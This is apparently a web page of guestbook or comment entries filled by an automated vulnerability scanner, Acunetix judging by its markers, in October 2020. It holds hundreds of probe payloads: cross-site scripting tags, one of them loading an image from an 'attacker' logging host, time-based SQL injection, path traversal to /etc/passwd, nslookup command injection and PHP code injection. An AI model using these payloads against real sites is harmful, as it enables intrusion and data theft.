
e [116.113.93.82] 2020-10-28 22:17:18

testasp.vulnweb.com

e [1] 2020-10-28 22:17:18

1

e [116.113.93.82] 2020-10-28 22:17:17

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [/www.vulnweb.com] 2020-10-28 22:17:17

1

e [116.113.93.82] 2020-10-28 22:17:17

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [<!--] 2020-10-28 22:17:17

1

e [116.113.93.82] 2020-10-28 22:17:16

http://hitfEunJDJTgc.bxss.me/

e ['"] 2020-10-28 22:17:16

1

e [116.113.93.82] 2020-10-28 22:17:15

Http://testasp.vulnweb.com/t/fit.txt

e [\] 2020-10-28 22:17:15

1

e [create/.] 2020-10-28 22:17:15

1

e [WEB-INF\web.xml] 2020-10-28 22:17:15

1

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 22:17:15

1

e [116.113.93.82] 2020-10-28 22:17:15

1some_inexistent_file_with_long_name.jpg

e [WEB-INF/web.xml] 2020-10-28 22:17:14

1

e [116.113.93.82] 2020-10-28 22:17:14

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:17:14

1

e [1'"] 2020-10-28 22:17:13

1

e [create] 2020-10-28 22:17:13

1

e [/WEB-INF/web.xml] 2020-10-28 22:17:13

1

e [116.113.93.82] 2020-10-28 22:17:13

1

e [http://hitisz4nBfLRn.bxss.me/] 2020-10-28 22:17:13

1

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:17:13

1

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 22:17:12

1

e [create] 2020-10-28 22:17:12

1

e [116.113.93.82] 2020-10-28 22:17:12

'"()

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 22:17:12

1

e [116.113.93.82] 2020-10-28 22:17:12

^(#$!@#$)(()))******

e [116.113.93.82] 2020-10-28 22:17:11

1

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 22:17:11

1

e [116.113.93.82] 2020-10-28 22:17:11

Array

e [file:///etc/passwd] 2020-10-28 22:17:11

1

e [116.113.93.82] 2020-10-28 22:17:11

!(()&&!|*|*|

e [7Y0noPR3'));select pg_sleep(6); -- ] 2020-10-28 22:17:10

1

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 22:17:10

1

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 22:17:10

1

e [J9pqO6AP');select pg_sleep(3); -- ] 2020-10-28 22:17:09

1

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 22:17:09

1

e [..] 2020-10-28 22:17:09

1

e [116.113.93.82] 2020-10-28 22:17:09

1

e [NABnxEmn';select pg_sleep(3); -- ] 2020-10-28 22:17:08

1

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 22:17:08

1

e [116.113.93.82] 2020-10-28 22:17:08

)

e [116.113.93.82] 2020-10-28 22:17:08

Array

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 22:17:08

1

e ['"()] 2020-10-28 22:17:07

1

e [rG5TrLwf'; waitfor delay '0:0:9' -- ] 2020-10-28 22:17:07

1

e [116.113.93.82] 2020-10-28 22:17:07

Array

e [1 waitfor delay '0:0:6' -- ] 2020-10-28 22:17:06

1

e [116.113.93.82] 2020-10-28 22:17:06

12345'"\'\");|]*{ <>

e [116.113.93.82] 2020-10-28 22:17:06

1&n927633=v968844

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 22:17:06

1

e [116.113.93.82] 2020-10-28 22:17:05

e [(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/] 2020-10-28 22:17:05

1

e [testasp.vulnweb.com] 2020-10-28 22:17:05

1

e [Array] 2020-10-28 22:17:05

1

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 22:17:05

1

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 22:17:04

1

e [^(#$!@#$)(()))******] 2020-10-28 22:17:04

1

e [%2fetc%2fpasswd] 2020-10-28 22:17:04

1

e [0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z] 2020-10-28 22:17:04

1

e [/etc/passwd] 2020-10-28 22:17:03

1

e [116.113.93.82] 2020-10-28 22:17:03

&nslookup aHFNQGdt&'\"`0&nslookup aHFNQGdt&`'

e [!(()&&!|*|*|] 2020-10-28 22:17:03

1

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 22:17:03

1

e [0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z] 2020-10-28 22:17:02

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 22:17:02

1

e [116.113.93.82] 2020-10-28 22:17:02

${9999697+9999905}

e [)] 2020-10-28 22:17:02

1

e [116.113.93.82] 2020-10-28 22:17:01

"+response.write(9140039*9527340)+"

e [if(now()=sysdate(),sleep(9),0)] 2020-10-28 22:17:01

1

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 22:17:01

1

e [116.113.93.82] 2020-10-28 22:17:01

$(nslookup poOeymmz)

e [1some_inexistent_file_with_long_name.82] 2020-10-28 22:17:00

1

e [116.113.93.82&n950927=v988432] 2020-10-28 22:17:00

1

e [116.113.93.82] 2020-10-28 22:17:00

set|set&set

e [-1" OR 2+195-195-1=0+0+0+1 -- ] 2020-10-28 22:17:00

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 22:17:00

1

e [116.113.93.82] 2020-10-28 22:16:59

1

e [-1' OR 2+415-415-1=0+0+0+1 or '3Tyv2qLh'='] 2020-10-28 22:16:59

1

e [Array] 2020-10-28 22:16:59

1

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 22:16:58

1

e [116.113.93.82] 2020-10-28 22:16:58

'+response.write(9140039*9527340)+'

e [116.113.93.82] 2020-10-28 22:16:58

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [-1' OR 2+520-520-1=0+0+0+1 -- ] 2020-10-28 22:16:58

1

e [${10000362+10000396}] 2020-10-28 22:16:58

1

e [Array] 2020-10-28 22:16:58

1

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 22:16:57

1

e [116.113.93.82] 2020-10-28 22:16:57

response.write(9140039*9527340)

e [12345'"\'\");|]*{ <>] 2020-10-28 22:16:57

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 22:16:56

1

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 22:16:56

1

e [] 2020-10-28 22:16:56

1

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 22:16:56

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 22:16:55

1

e [116.113.93.82] 2020-10-28 22:16:55

htIcurUL

e [-1 OR 2+587-587-1=0+0+0+1] 2020-10-28 22:16:55

1

e [-1 OR 2+844-844-1=0+0+0+1 -- ] 2020-10-28 22:16:54

1

e ["+response.write(9048995*9644058)+"] 2020-10-28 22:16:53

1

e [&nslookup J6yYQDkF&'\"`0&nslookup J6yYQDkF&`'] 2020-10-28 22:16:52

1

e [12JlOU8B] 2020-10-28 22:16:52

1

e ['+response.write(9048995*9644058)+'] 2020-10-28 22:16:51

1

e [116.113.93.82] 2020-10-28 22:16:51

1

e [$(nslookup qPaNw0qT)] 2020-10-28 22:16:51

1

e [4MgHnnyF] 2020-10-28 22:16:51

1

e [response.write(9048995*9644058)] 2020-10-28 22:16:50

1

e [116.113.93.82] 2020-10-28 22:16:50

1

e [set|set&set] 2020-10-28 22:16:50

1

e [116.113.93.82] 2020-10-28 22:15:29

1

e [116.113.93.82] 2020-10-28 21:43:54

1

e [116.113.93.82] 2020-10-28 21:43:52

1

e [116.113.93.82] 2020-10-28 21:43:48

1

e [116.113.93.82] 2020-10-28 21:43:45

1<wxtwix<

e [116.113.93.82] 2020-10-28 21:43:43

1<img sRc='http://attacker-9409/log.php?

e [116.113.93.82] 2020-10-28 21:43:41

1<OKMbmw x=9313>

e [116.113.93.82] 2020-10-28 21:43:38

1<ifRAme sRc=9114.com></IfRamE>

e [116.113.93.82] 2020-10-28 21:43:35

1<WMDIFD>D1GLI[!+!]</WMDIFD>

e [116.113.93.82] 2020-10-28 21:43:33

1ZxhRb <ScRiPt >rg7S(9223)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:43:30

1<% contenteditable onresize=rg7S(9795)>

e [116.113.93.82] 2020-10-28 21:43:27

1}body{acu:Expre/**/SSion(rg7S(9675))}

e [116.113.93.82] 2020-10-28 21:43:24

1<img<!-- --> src=x onerror=alert(9190);//><!-- -->

e [116.113.93.82] 2020-10-28 21:43:22

[url=http://www.vulnweb.com][/url]

e [116.113.93.82] 2020-10-28 21:43:19

<a HrEF=jaVaScRiPT:>

e [116.113.93.82] 2020-10-28 21:43:17

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82] 2020-10-28 21:43:14

1<input autofocus onfocus=rg7S(9213)>

e [116.113.93.82] 2020-10-28 21:43:12

e [116.113.93.82] 2020-10-28 21:43:09

1<ScRiPt>rg7S(9875)</sCripT>

e [116.113.93.82] 2020-10-28 21:43:06

1\u003CScRiPt\rg7S(9650)\u003C/sCripT\u003E

e [116.113.93.82] 2020-10-28 21:43:04

%31%3C%53%63%52%69%50%74%20%3E%72%67%37%53%289019%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82] 2020-10-28 21:43:02

1<img/src=">" onerror=alert(9547)>

e [116.113.93.82] 2020-10-28 21:42:59

1<img src=xyz OnErRor=rg7S(9759)>

e [116.113.93.82] 2020-10-28 21:42:57

1<img src=//testasp.vulnweb.com/t/dot.gif onload=rg7S(9057)>

e [116.113.93.82] 2020-10-28 21:42:54

1<body onload=rg7S(9650)>

e [116.113.93.82] 2020-10-28 21:42:52

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9250'>

e [116.113.93.82] 2020-10-28 21:42:49

1<isindex type=image src=1 onerror=rg7S(9570)>

e [116.113.93.82] 2020-10-28 21:42:46

1<svg

e [116.113.93.82] 2020-10-28 21:42:44

1<video><source onerror="javascript:rg7S(9556)">

e [116.113.93.82] 2020-10-28 21:42:42

1<ScRiPt >rg7S(9626)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:42:39

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9696></ScRiPt>

e [116.113.93.82] 2020-10-28 21:42:36

1<ScRiPt >rg7S(9305)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:42:33

1<ScR<ScRiPt>IpT>rg7S(9060)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 21:42:31

1<script>rg7S(9830)</script>

e [116.113.93.82] 2020-10-28 21:42:29

1<W4CO7P>YDORQ[!+!]</W4CO7P>

e [116.113.93.82] 2020-10-28 21:42:27

1<ScRiPt >rg7S(9494)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:42:25

{{9999913*9999240}}

e [116.113.93.82] 2020-10-28 21:42:23

acux3286

e [116.113.93.82] 2020-10-28 21:42:20

acu7294<s1﹥s2ʺs3ʹuca7294

e [116.113.93.82] 2020-10-28 21:42:17

19819456

e [116.113.93.82] 2020-10-28 21:42:14

'"()&%<acx><ScRiPt >rg7S(9884)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:42:12

1'"()&%<acx><ScRiPt >rg7S(9141)</ScRiPt>

e [116.113.93.82<e0Oh7n<] 2020-10-28 21:42:05

1

e [116.113.93.82<img sRc='http://attacker-9591/log.php?] 2020-10-28 21:42:03

1

e [116.113.93.82<ieZZB0 x=9376>] 2020-10-28 21:42:01

1

e [116.113.93.82<ifRAme sRc=9164.com></IfRamE>] 2020-10-28 21:41:58

1

e [116.113.93.82<WWFHB9>ZA1S1[!+!]</WWFHB9>] 2020-10-28 21:41:55

1

e [116.113.93.82] 2020-10-28 21:41:53

1

e [116.113.93.82] 2020-10-28 21:41:52

1

e [116.113.93.82YiAlJ <ScRiPt >rg7S(9217)</ScRiPt>] 2020-10-28 21:41:52

1

e [116.113.93.82] 2020-10-28 21:41:50

1

e [116.113.93.82<% contenteditable onresize=rg7S(9616)>] 2020-10-28 21:41:50

1

e [116.113.93.82] 2020-10-28 21:41:49

1

e [116.113.93.82] 2020-10-28 21:41:48

1

e [116.113.93.82}body{acu:Expre/**/SSion(rg7S(9786))}] 2020-10-28 21:41:47

1

e [116.113.93.82] 2020-10-28 21:41:47

1

e [116.113.93.82] 2020-10-28 21:41:44

1

e [116.113.93.82<img<!-- --> src=x onerror=alert(9626);//><!-- -->] 2020-10-28 21:41:44

1

e [116.113.93.82] 2020-10-28 21:41:43

1

e [116.113.93.82] 2020-10-28 21:41:42

1

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 21:41:42

1

e [116.113.93.82] 2020-10-28 21:41:42

1

e [116.113.93.82] 2020-10-28 21:41:42

1

e [116.113.93.82] 2020-10-28 21:41:41

1

e [116.113.93.82] 2020-10-28 21:41:40

1

e [116.113.93.82] 2020-10-28 21:41:39

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 21:41:39

1

e [116.113.93.82] 2020-10-28 21:41:39

1

e [116.113.93.82] 2020-10-28 21:41:38

1

e [116.113.93.82] 2020-10-28 21:41:38

1

e [116.113.93.82] 2020-10-28 21:41:37

1

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 21:41:37

1

e [116.113.93.82] 2020-10-28 21:41:37

1

e [116.113.93.82] 2020-10-28 21:41:36

1

e [116.113.93.82] 2020-10-28 21:41:35

1

e [116.113.93.82] 2020-10-28 21:41:35

1

e [116.113.93.82] 2020-10-28 21:41:34

1

e [116.113.93.82<input autofocus onfocus=rg7S(9881)>] 2020-10-28 21:41:34

1

e [116.113.93.82] 2020-10-28 21:41:33

1

e [116.113.93.82] 2020-10-28 21:41:33

1

e [116.113.93.82] 2020-10-28 21:41:33

1

e [116.113.93.82] 2020-10-28 21:41:32

1

e [116.113.93.82] 2020-10-28 21:41:32

1

e [] 2020-10-28 21:41:32

1

e [116.113.93.82] 2020-10-28 21:41:31

1

e [116.113.93.82] 2020-10-28 21:41:31

1

e [116.113.93.82] 2020-10-28 21:41:30

1

e [116.113.93.82<ScRiPt>rg7S(9997)</sCripT>] 2020-10-28 21:41:29

1

e [116.113.93.82] 2020-10-28 21:41:29

1

e [116.113.93.82] 2020-10-28 21:41:28

1

e [116.113.93.82] 2020-10-28 21:41:26

1

e [116.113.93.82\u003CScRiPt\rg7S(9243)\u003C/sCripT\u003E] 2020-10-28 21:41:26

1

e [116.113.93.82] 2020-10-28 21:41:25

1

e [116.113.93.82] 2020-10-28 21:41:24

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%72%67%37%53%289792%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 21:41:23

1

e [116.113.93.82] 2020-10-28 21:41:23

1

e [116.113.93.82] 2020-10-28 21:41:22

1

e [116.113.93.82<img/src=">" onerror=alert(9126)>] 2020-10-28 21:41:21

1

e [116.113.93.82<img src=xyz OnErRor=rg7S(9813)>] 2020-10-28 21:41:18

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=rg7S(9216)>] 2020-10-28 21:41:16

1

e [116.113.93.82<body onload=rg7S(9478)>] 2020-10-28 21:41:13

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9942'>] 2020-10-28 21:41:11

1

e [116.113.93.82<isindex type=image src=1 onerror=rg7S(9220)>] 2020-10-28 21:41:08

1

e [116.113.93.82<svg ] 2020-10-28 21:41:06

1

e [116.113.93.82] 2020-10-28 21:41:05

1

e [116.113.93.82] 2020-10-28 21:41:03

1

e [116.113.93.82<video><source onerror="javascript:rg7S(9595)">] 2020-10-28 21:41:03

1

e [116.113.93.82] 2020-10-28 21:41:03

tgWV2UlS'));select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 21:41:02

1

e [116.113.93.82] 2020-10-28 21:41:02

DgPpAvck');select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:41:02

WEB-INF\web.xml

e [116.113.93.82] 2020-10-28 21:41:02

1

e [116.113.93.82<ScRiPt >rg7S(9797)</ScRiPt>] 2020-10-28 21:41:02

1

e [116.113.93.82] 2020-10-28 21:41:01

cqrWeF3z';select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 21:41:01

1

e [116.113.93.82] 2020-10-28 21:41:01

WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 21:41:00

-1));select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 21:40:59

1

e [116.113.93.82] 2020-10-28 21:40:59

/WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 21:40:59

-1);select pg_sleep(6); --

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9698></ScRiPt>] 2020-10-28 21:40:59

1

e [116.113.93.82] 2020-10-28 21:40:58

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 21:40:58

-1;select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:40:57

1

e [116.113.93.82] 2020-10-28 21:40:57

file:///etc/passwd

e [116.113.93.82] 2020-10-28 21:40:57

ImjKRvSi'; waitfor delay '0:0:9' --

e [116.113.93.82<ScRiPt >rg7S(9793)</ScRiPt>] 2020-10-28 21:40:56

1

e [116.113.93.82] 2020-10-28 21:40:56

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 21:40:56

1 waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 21:40:55

..

e [116.113.93.82] 2020-10-28 21:40:55

-1); waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 21:40:54

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82<ScR<ScRiPt>IpT>rg7S(9842)</sCr<ScRiPt>IpT>] 2020-10-28 21:40:54

1

e [116.113.93.82] 2020-10-28 21:40:53

-1; waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 21:40:53

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82] 2020-10-28 21:40:53

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

e [116.113.93.82] 2020-10-28 21:40:52

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82] 2020-10-28 21:40:52

0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

e [116.113.93.82<script>rg7S(9452)</script>] 2020-10-28 21:40:52

1

e [116.113.93.82] 2020-10-28 21:40:51

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z

e [116.113.93.82] 2020-10-28 21:40:51

%2fetc%2fpasswd

e [116.113.93.82] 2020-10-28 21:40:50

if(now()=sysdate(),sleep(3),0)

e [116.113.93.82] 2020-10-28 21:40:50

/etc/passwd

e [116.113.93.82] 2020-10-28 21:40:49

-1" OR 2+749-749-1=0+0+0+1 --

e [116.113.93.82<WPUKFI>VHQDQ[!+!]</WPUKFI>] 2020-10-28 21:40:49

1

e [116.113.93.82] 2020-10-28 21:40:49

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82] 2020-10-28 21:40:48

e [116.113.93.82] 2020-10-28 21:40:48

-1' OR 2+681-681-1=0+0+0+1 or 'qiF7uS3Z'='

e [116.113.93.82] 2020-10-28 21:40:48

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:40:47

e [116.113.93.82] 2020-10-28 21:40:47

-1' OR 2+265-265-1=0+0+0+1 --

e [116.113.93.82<ScRiPt >rg7S(9860)</ScRiPt>] 2020-10-28 21:40:47

1

e [116.113.93.82] 2020-10-28 21:40:47

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82] 2020-10-28 21:40:46

-1 OR 2+150-150-1=0+0+0+1

e [116.113.93.82] 2020-10-28 21:40:46

JyI=

e [116.113.93.82] 2020-10-28 21:40:45

../../../../../../../../../../etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:40:44

-1 OR 2+68-68-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:40:44

@@Ml62N

e [116.113.93.82] 2020-10-28 21:40:44

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [{{9999810*9999897}}] 2020-10-28 21:40:44

1

e [116.113.93.82] 2020-10-28 21:40:44

1

e [116.113.93.82] 2020-10-28 21:40:43

7UD1gNcr

e [116.113.93.82] 2020-10-28 21:40:43

1

e [116.113.93.82] 2020-10-28 21:40:43

../../../../../../../../../../../../../../../proc/version

e [116.113.93.82] 2020-10-28 21:40:43

1

e [116.113.93.82] 2020-10-28 21:40:43

1

e [116.113.93.82] 2020-10-28 21:40:43

\

e [116.113.93.82] 2020-10-28 21:40:42

../../../../../../../../../../etc/passwd

e [116.113.93.82] 2020-10-28 21:40:42

1

e [acux6079] 2020-10-28 21:40:42

1

e [116.113.93.82] 2020-10-28 21:40:42

1

e [116.113.93.82] 2020-10-28 21:40:42

1'"

e [116.113.93.82] 2020-10-28 21:40:42

1

e [116.113.93.82] 2020-10-28 21:40:41

1

e [116.113.93.82] 2020-10-28 21:40:40

1

e [116.113.93.82] 2020-10-28 21:40:40

1

e [acu2774<s1﹥s2ʺs3ʹuca2774] 2020-10-28 21:40:39

1

e [116.113.93.82] 2020-10-28 21:40:39

1

e [116.113.93.82] 2020-10-28 21:40:38

1

e [116.113.93.82] 2020-10-28 21:40:38

1

e [116.113.93.82] 2020-10-28 21:40:37

1

e [116.113.93.829096994] 2020-10-28 21:40:37

1

e [116.113.93.82] 2020-10-28 21:40:37

<!--

e [116.113.93.82] 2020-10-28 21:40:37

1

e [116.113.93.82] 2020-10-28 21:40:36

1

e [116.113.93.82] 2020-10-28 21:40:35

'"

e [116.113.93.82] 2020-10-28 21:40:34

1

e [116.113.93.82] 2020-10-28 21:40:34

1

e ['"()&%<acx><ScRiPt >rg7S(9551)</ScRiPt>] 2020-10-28 21:40:34

1

e [116.113.93.82] 2020-10-28 21:40:34

1

e [116.113.93.82] 2020-10-28 21:40:33

${@print(md5(acunetix_wvs_security_test))}\

e [] 2020-10-28 21:40:33

1

e [116.113.93.82] 2020-10-28 21:40:33

${@print(md5(acunetix_wvs_security_test))}

e [116.113.93.82] 2020-10-28 21:40:33

/www.vulnweb.com

e [<!--] 2020-10-28 21:40:33

1

e [] 2020-10-28 21:40:32

1

e [116.113.93.82] 2020-10-28 21:40:32

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [116.113.93.82] 2020-10-28 21:40:32

create/.

e [116.113.93.82'"()&%<acx><ScRiPt >rg7S(9846)</ScRiPt>] 2020-10-28 21:40:32

1

e [116.113.93.82] 2020-10-28 21:40:32

";print(md5(acunetix_wvs_security_test));$a="

e ['"] 2020-10-28 21:40:32

1

e [116.113.93.82] 2020-10-28 21:40:32

1

e [JyI=] 2020-10-28 21:40:32

1

e [116.113.93.82] 2020-10-28 21:40:32

create

e [116.113.93.82] 2020-10-28 21:40:31

';print(md5(acunetix_wvs_security_test));$a='

e [/www.vulnweb.com] 2020-10-28 21:40:31

1

e [116.113.93.82] 2020-10-28 21:40:31

1

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 21:40:31

1

e [116.113.93.82] 2020-10-28 21:40:31

1

e [@@u1oYu] 2020-10-28 21:40:31

1

e [116.113.93.82] 2020-10-28 21:40:30

create

e [116.113.93.82] 2020-10-28 21:40:30

;print(md5(acunetix_wvs_security_test));

e [116.113.93.82] 2020-10-28 21:40:30

1

e [116.113.93.82] 2020-10-28 21:40:30

1

e [116.113.93.82] 2020-10-28 21:40:29

1

e [1] 2020-10-28 21:40:29

1

e [116.113.93.82] 2020-10-28 21:40:29

1

e [116.113.93.82] 2020-10-28 21:40:29

testasp.vulnweb.com

e [116.113.93.82] 2020-10-28 21:40:28

http://hitBIgMXPtyzs.bxss.me/

e [116.113.93.82] 2020-10-28 21:40:28

1

e [\] 2020-10-28 21:40:28

1

e [116.113.93.82] 2020-10-28 21:40:28

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [1'"] 2020-10-28 21:40:27

1

e [116.113.93.82] 2020-10-28 21:40:27

Http://testasp.vulnweb.com/t/fit.txt

e [create/.] 2020-10-28 21:40:26

1

e [116.113.93.82] 2020-10-28 21:40:25

1some_inexistent_file_with_long_name.jpg

e [116.113.93.82] 2020-10-28 21:40:25

testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 21:40:25

^(#$!@#$)(()))******

e [http://hit99wTcQNMpt.bxss.me/] 2020-10-28 21:40:25

1

e [create] 2020-10-28 21:40:25

1

e [116.113.93.82] 2020-10-28 21:40:24

'"()

e [116.113.93.82] 2020-10-28 21:40:24

1

e [116.113.93.82] 2020-10-28 21:40:24

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [116.113.93.82] 2020-10-28 21:40:24

HttP://testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 21:40:24

!(()&&!|*|*|

e [116.113.93.82] 2020-10-28 21:40:24

1

e [create] 2020-10-28 21:40:24

1

e [116.113.93.82] 2020-10-28 21:40:23

Array

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 21:40:23

1

e [116.113.93.82] 2020-10-28 21:40:23

)

e [116.113.93.82] 2020-10-28 21:40:23

1

e [116.113.93.82] 2020-10-28 21:40:23

1

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 21:40:23

1

e [WEB-INF\web.xml] 2020-10-28 21:40:22

1

e [116.113.93.82] 2020-10-28 21:40:22

1

e [116.113.93.82] 2020-10-28 21:40:22

1

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 21:40:22

1

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:40:22

1

e [WEB-INF/web.xml] 2020-10-28 21:40:22

1

e [116.113.93.82] 2020-10-28 21:40:22

1

e [uGBjs46p'));select pg_sleep(3); -- ] 2020-10-28 21:40:21

1

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:40:21

1

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 21:40:21

1

e ['"()] 2020-10-28 21:40:21

1

e [/WEB-INF/web.xml] 2020-10-28 21:40:21

1

e [116.113.93.82] 2020-10-28 21:40:20

1&n998665=v962325

e [DR6tFeYa');select pg_sleep(3); -- ] 2020-10-28 21:40:20

1

e [^(#$!@#$)(()))******] 2020-10-28 21:40:19

1

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 21:40:19

1

e [Array] 2020-10-28 21:40:19

1

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 21:40:19

1

e [MHTkyPmH';select pg_sleep(9); -- ] 2020-10-28 21:40:19

1

e [testasp.vulnweb.com] 2020-10-28 21:40:19

1

